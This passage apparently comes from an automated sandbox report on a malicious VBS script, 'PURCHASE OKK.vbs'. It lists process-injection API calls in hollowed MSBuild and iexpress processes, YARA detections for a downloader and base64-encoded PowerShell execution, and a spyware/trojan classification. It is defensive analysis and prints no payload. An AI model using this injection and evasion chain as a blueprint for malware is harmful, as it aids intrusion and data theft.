                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A82F90 NtProtectVirtualMemory
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A82FE0 NtCreateFile
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A82F30 NtCreateSection
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A82F60 NtCreateProcessEx
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A82EA0 NtAdjustPrivilegesToken
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A82E80 NtReadVirtualMemory
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A82EE0 NtQueueApcThread
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A82E30 NtWriteVirtualMemory
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04E035C0 NtCreateMutant,LdrInitializeThunk
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04E04650 NtSuspendThread,LdrInitializeThunk
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04E04340 NtSetContextThread,LdrInitializeThunk
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04E02CA0 NtQueryInformationToken,LdrInitializeThunk
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04E02C60 NtCreateKey,LdrInitializeThunk
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04E02C70 NtFreeVirtualMemory,LdrInitializeThunk
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04E02DF0 NtQuerySystemInformation,LdrInitializeThunk
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04E02DD0 NtDelayExecution,LdrInitializeThunk
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04E02D30 NtUnmapViewOfSection,LdrInitializeThunk
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04E02D10 NtMapViewOfSection,LdrInitializeThunk
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04E02EE0 NtQueueApcThread,LdrInitializeThunk
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04E02E80 NtReadVirtualMemory,LdrInitializeThunk
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04E02FE0 NtCreateFile,LdrInitializeThunk
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04E02FB0 NtResumeThread,LdrInitializeThunk
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04E02F30 NtCreateSection,LdrInitializeThunk
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04E039B0 NtGetContextThread,LdrInitializeThunk
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04E02AF0 NtWriteFile,LdrInitializeThunk
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04E02AD0 NtReadFile,LdrInitializeThunk
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04E02BE0 NtQueryValueKey,LdrInitializeThunk
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04E02BF0 NtAllocateVirtualMemory,LdrInitializeThunk
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04E02BA0 NtEnumerateValueKey,LdrInitializeThunk
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04E02B60 NtClose,LdrInitializeThunk
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04E03090 NtSetValueKey
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04E03010 NtOpenDirectoryObject
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04E02CF0 NtOpenProcess
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04E02CC0 NtQueryVirtualMemory
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04E02C00 NtQueryInformationProcess
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04E02DB0 NtEnumerateKey
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04E03D70 NtOpenThread
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04E02D00 NtSetInformationFile
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04E03D10 NtOpenProcessToken
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04E02EA0 NtAdjustPrivilegesToken
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04E02E30 NtWriteVirtualMemory
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04E02FA0 NtQuerySection
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04E02F90 NtProtectVirtualMemory
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04E02F60 NtCreateProcessEx
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04E02AB0 NtWaitForSingleObject
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04E02B80 NtQueryInformationFile
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_02EE96D0 NtReadFile
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_02EE97C0 NtDeleteFile
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_02EE9560 NtCreateFile
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_02EE9860 NtClose
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_02EE99D0 NtAllocateVirtualMemory
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04CEF8C9 NtClose
                  Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B0FF0910_2_01B0FF09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AC4F4010_2_01AC4F40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A59EB010_2_01A59EB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B0CE9310_2_01B0CE93
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A62E9010_2_01A62E90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B0EEDB10_2_01B0EEDB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B0EE2610_2_01B0EE26
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A50E5910_2_01A50E59
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E7E4F612_2_04E7E4F6
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E8244612_2_04E82446
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DC146012_2_04DC1460
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E8F43F12_2_04E8F43F
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E6D5B012_2_04E6D5B0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E9059112_2_04E90591
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E8757112_2_04E87571
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DD053512_2_04DD0535
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E816CC12_2_04E816CC
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DEC6E012_2_04DEC6E0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DCC7C012_2_04DCC7C0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E8F7B012_2_04E8F7B0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DF475012_2_04DF4750
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DD077012_2_04DD0770
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E870E912_2_04E870E9
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E8F0E012_2_04E8F0E0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DD70C012_2_04DD70C0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E7F0CC12_2_04E7F0CC
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E881CC12_2_04E881CC
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E901AA12_2_04E901AA
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DDB1B012_2_04DDB1B0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E9B16B12_2_04E9B16B
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E0516C12_2_04E0516C
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DBF17212_2_04DBF172
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DC010012_2_04DC0100
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E6A11812_2_04E6A118
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E712ED12_2_04E712ED
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DEB2C012_2_04DEB2C0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DD52A012_2_04DD52A0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E7027412_2_04E70274
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E903E612_2_04E903E6
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DDE3F012_2_04DDE3F0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E1739A12_2_04E1739A
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DBD34C12_2_04DBD34C
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E8A35212_2_04E8A352
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E8132D12_2_04E8132D
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E8FCF212_2_04E8FCF2
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DC0CF212_2_04DC0CF2
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E70CB512_2_04E70CB5
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E49C3212_2_04E49C32
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DD0C0012_2_04DD0C00
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DEFDC012_2_04DEFDC0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DCADE012_2_04DCADE0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DE8DBF12_2_04DE8DBF
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E87D7312_2_04E87D73
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DD3D4012_2_04DD3D40
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E81D5A12_2_04E81D5A
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DDAD0012_2_04DDAD00
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E8EEDB12_2_04E8EEDB
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DE2E9012_2_04DE2E90
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DD9EB012_2_04DD9EB0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E8CE9312_2_04E8CE93
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DD0E5912_2_04DD0E59
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E8EE2612_2_04E8EE26
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DC2FC812_2_04DC2FC8
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DDCFE012_2_04DDCFE0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DD1F9212_2_04DD1F92
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E8FFB112_2_04E8FFB1
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E44F4012_2_04E44F40
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E8FF0912_2_04E8FF09
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DF0F3012_2_04DF0F30
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DFE8F012_2_04DFE8F0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DD38E012_2_04DD38E0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DB68B812_2_04DB68B8
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DD284012_2_04DD2840
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DDA84012_2_04DDA840
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E9A9A612_2_04E9A9A6
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DD29A012_2_04DD29A0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DD995012_2_04DD9950
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DEB95012_2_04DEB950
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DE696212_2_04DE6962
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E7DAC612_2_04E7DAC6
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E15AA012_2_04E15AA0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E6DAAC12_2_04E6DAAC
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DCEA8012_2_04DCEA80
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E43A6C12_2_04E43A6C
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E8FA4912_2_04E8FA49
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E87A4612_2_04E87A46
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E0DBF912_2_04E0DBF9
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E86BD712_2_04E86BD7
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DEFB8012_2_04DEFB80
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E8FB7612_2_04E8FB76
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E8AB4012_2_04E8AB40
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_02ED204012_2_02ED2040
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_02ECB24912_2_02ECB249
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_02ECB20012_2_02ECB200
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_02ECD0D012_2_02ECD0D0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_02ECB0B012_2_02ECB0B0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_02ECB1F512_2_02ECB1F5
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_02ED572012_2_02ED5720
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_02ED390E12_2_02ED390E
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_02ED391012_2_02ED3910
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_02ECCEB012_2_02ECCEB0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_02EEBE9012_2_02EEBE90
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04CEE6F912_2_04CEE6F9
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04CEE6F112_2_04CEE6F1
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04CED7B812_2_04CED7B8
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04CEE23412_2_04CEE234
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04CEE35412_2_04CEE354
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: String function: 01A3B970 appears 266 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: String function: 01A97E54 appears 88 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: String function: 01ACF290 appears 105 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: String function: 01A85130 appears 36 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: String function: 01ABEA12 appears 84 times
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: String function: 04DBB970 appears 266 times
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: String function: 04E17E54 appears 88 times
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: String function: 04E4F290 appears 105 times
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: String function: 04E05130 appears 36 times
                  Source: C:\Windows\SysWOW64\iexpress.exe | Code function: String function: 04E3EA12 appears 84 times
                  Source: PURCHASE OKK.vbs | Initial sample: Strings found which are bigger than 50
                  Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 3769
                  Source: 8.2.powershell.exe.15d903ef8d0.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_RawPaste_Reverse_URL author = ditekSHen, description = Detects executables (downloaders) containing reversed URLs to raw contents of a paste
                  Source: 8.2.powershell.exe.15d903ef8d0.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
                  Source: Process Memory Space: powershell.exe PID: 7780, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 7916, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 8040, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: 8.2.powershell.exe.15da8710000.3.raw.unpack, h.cs | Cryptographic APIs: 'CreateDecryptor'
                  Source: 8.2.powershell.exe.15da8710000.3.raw.unpack, av.cs | Cryptographic APIs: 'CreateDecryptor'
                  Source: 8.2.powershell.exe.15d903ef8d0.0.raw.unpack, h.cs | Cryptographic APIs: 'CreateDecryptor'
                  Source: 8.2.powershell.exe.15d903ef8d0.0.raw.unpack, av.cs | Cryptographic APIs: 'CreateDecryptor'
                  Source: 8.2.powershell.exe.15da8750000.4.raw.unpack, b.cs | Cryptographic APIs: 'CreateDecryptor'
                  Source: 8.2.powershell.exe.15da8750000.4.raw.unpack, am.cs | Cryptographic APIs: 'CreateDecryptor'
                  Source: 8.2.powershell.exe.15d905607b0.1.raw.unpack, b.cs | Cryptographic APIs: 'CreateDecryptor'
                  Source: 8.2.powershell.exe.15d905607b0.1.raw.unpack, am.cs | Cryptographic APIs: 'CreateDecryptor'
                  Source: 12.2.iexpress.exe.310a910.0.raw.unpack, TaskParameter.cs | Task registration methods: 'CreateNewTaskItemFrom'
                  Source: 12.2.iexpress.exe.310a910.0.raw.unpack, OutOfProcTaskHostNode.cs | Task registration methods: 'RegisterTaskObject', 'UnregisterPacketHandler', 'RegisterPacketHandler', 'UnregisterTaskObject', 'GetRegisteredTaskObject'
                  Source: 12.2.iexpress.exe.310a910.0.raw.unpack, TaskLoader.cs | Task registration methods: 'CreateTask'
                  Source: 12.2.iexpress.exe.310a910.0.raw.unpack, RegisteredTaskObjectCacheBase.cs | Task registration methods: 'GetLazyCollectionForLifetime', 'RegisterTaskObject', 'DisposeObjects', 'IsCollectionEmptyOrUncreated', 'UnregisterTaskObject', 'DisposeCacheObjects', 'GetRegisteredTaskObject', 'GetCollectionForLifetime'
                  Source: 20.2.DmMVOWsP1JSI77P.exe.327cd14.1.raw.unpack, CommunicationsUtilities.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 20.2.DmMVOWsP1JSI77P.exe.327cd14.1.raw.unpack, CommunicationsUtilities.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 20.2.DmMVOWsP1JSI77P.exe.327cd14.1.raw.unpack, NodeEndpointOutOfProcBase.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
                  Source: 20.2.DmMVOWsP1JSI77P.exe.327cd14.1.raw.unpack, NodeEndpointOutOfProcBase.cs | Security API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
                  Source: 20.2.DmMVOWsP1JSI77P.exe.327cd14.1.raw.unpack, NodeEndpointOutOfProcBase.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 12.2.iexpress.exe.53bcd14.3.raw.unpack, NodeEndpointOutOfProcBase.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
                  Source: 12.2.iexpress.exe.53bcd14.3.raw.unpack, NodeEndpointOutOfProcBase.cs | Security API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
                  Source: 12.2.iexpress.exe.53bcd14.3.raw.unpack, NodeEndpointOutOfProcBase.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 12.2.iexpress.exe.310a910.0.raw.unpack, NodeEndpointOutOfProcBase.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
                  Source: 12.2.iexpress.exe.310a910.0.raw.unpack, NodeEndpointOutOfProcBase.cs | Security API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
                  Source: 12.2.iexpress.exe.310a910.0.raw.unpack, NodeEndpointOutOfProcBase.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 12.2.iexpress.exe.310a910.0.raw.unpack, CommunicationsUtilities.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 12.2.iexpress.exe.310a910.0.raw.unpack, CommunicationsUtilities.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 12.2.iexpress.exe.53bcd14.3.raw.unpack, CommunicationsUtilities.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 12.2.iexpress.exe.53bcd14.3.raw.unpack, CommunicationsUtilities.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: iexpress.exe, 0000000C.00000002.2231547950.00000000053BC000.00000004.10000000.00040000.00000000.sdmp, iexpress.exe, 0000000C.00000002.2227220889.000000000310A000.00000004.00000020.00020000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 00000014.00000002.2230655033.000000000327C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.1565665797.000000001EA8C000.00000004.80000000.00040000.00000000.sdmp | Binary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
                  Source: iexpress.exe, 0000000C.00000002.2231547950.00000000053BC000.00000004.10000000.00040000.00000000.sdmp, iexpress.exe, 0000000C.00000002.2227220889.000000000310A000.00000004.00000020.00020000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 00000014.00000002.2230655033.000000000327C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.1565665797.000000001EA8C000.00000004.80000000.00040000.00000000.sdmp | Binary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
                  Source: iexpress.exe, 0000000C.00000002.2231547950.00000000053BC000.00000004.10000000.00040000.00000000.sdmp, iexpress.exe, 0000000C.00000002.2227220889.000000000310A000.00000004.00000020.00020000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 00000014.00000002.2230655033.000000000327C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.1565665797.000000001EA8C000.00000004.80000000.00040000.00000000.sdmp | Binary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
                  Source: iexpress.exe, 0000000C.00000002.2231547950.00000000053BC000.00000004.10000000.00040000.00000000.sdmp, iexpress.exe, 0000000C.00000002.2227220889.000000000310A000.00000004.00000020.00020000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 00000014.00000002.2230655033.000000000327C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.1565665797.000000001EA8C000.00000004.80000000.00040000.00000000.sdmp | Binary or memory string: *.sln
                  Source: iexpress.exe, 0000000C.00000002.2231547950.00000000053BC000.00000004.10000000.00040000.00000000.sdmp, iexpress.exe, 0000000C.00000002.2227220889.000000000310A000.00000004.00000020.00020000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 00000014.00000002.2230655033.000000000327C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.1565665797.000000001EA8C000.00000004.80000000.00040000.00000000.sdmp | Binary or memory string: MSBuild MyApp.csproj /t:Clean
                  Source: iexpress.exe, 0000000C.00000002.2231547950.00000000053BC000.00000004.10000000.00040000.00000000.sdmp, iexpress.exe, 0000000C.00000002.2227220889.000000000310A000.00000004.00000020.00020000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 00000014.00000002.2230655033.000000000327C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.1565665797.000000001EA8C000.00000004.80000000.00040000.00000000.sdmp | Binary or memory string: /ignoreprojectextensions:.sln
                  Source: iexpress.exe, 0000000C.00000002.2231547950.00000000053BC000.00000004.10000000.00040000.00000000.sdmp, iexpress.exe, 0000000C.00000002.2227220889.000000000310A000.00000004.00000020.00020000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 00000014.00000002.2230655033.000000000327C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.1565665797.000000001EA8C000.00000004.80000000.00040000.00000000.sdmp | Binary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.
                  Source: classification engine | Classification label: mal100.spre.troj.spyw.expl.evad.winVBS@21/15@12/9
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7788:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7728:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j33tzyyw.j1n.ps1
                  Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PURCHASE OKK.vbs"
                  Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
